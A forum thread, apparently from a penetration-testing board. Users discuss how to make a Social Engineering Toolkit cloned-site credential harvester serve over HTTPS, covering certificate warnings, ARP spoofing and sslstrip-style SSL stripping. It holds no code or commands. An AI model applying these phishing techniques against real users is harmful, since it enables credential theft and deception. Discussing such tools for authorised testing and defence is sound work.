If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

Social Engineering Toolkit - Credential harvesting via https

I have SET up and running and functional for harvesting credentials for a cloned https site. However, the site is hosted in SET on standard http port 80. I am looking to be able to host the cloned site using https as it adds an additional layer of reality to the cloned site. I think that it is also prudent to encrypt this traffic since you are capturing users credentials. In the set_config file, you can change the web port and I am able to change it to port 443, however it still uses only standard http without encryption. Has anyone tried something like this?

Re: Social Engineering Toolkit - Credential harvesting via https

Originally Posted by Agarax

Keep in mind that your modern web browser will start screaming at the user that he is trying to connect to a site with an unrecognized certificate ...

Agarax, it depends on whether SET does something like spoofing arp or if it rewrites an HTML landing page to strip out SSL like Moxie's sslstrip. The former will result in screaming and the latter requires the user to not notice the missing padlock.

Re: Social Engineering Toolkit - Credential harvesting via https

Originally Posted by frankpuccino

Agarax, it depends on whether SET does something like spoofing arp or if it rewrites an HTML landing page to strip out SSL like Moxie's sslstrip. The former will result in screaming and the latter requires the user to not notice the missing padlock.

Frank

Frank,

My understanding was that the OP was specifically talking about cloning the site and having the user connect to you with HTTPS instead of HTTP. In order for it to be HTTPS you need a cert. Otherwise the default use of Port 80 already in the program would be adequate.

Only exception would be if you were able to grab the legit private key from the website during the pentest. But if you have enough access to the website to grab the private keys you don't need to go through the trouble of spoofing it and getting a user to connect, you can just set up listeners on the server.

Cheers,

Agarax

"If you haven’t trashed your computer while doing something questionable, then you’re not a computer scientist – you’re just an arts grad who didn’t get laid."

If the time stamp for my post is less than 15 minutes old, hold off on the flamethrower, there's a pretty decent chance I'm going to change it.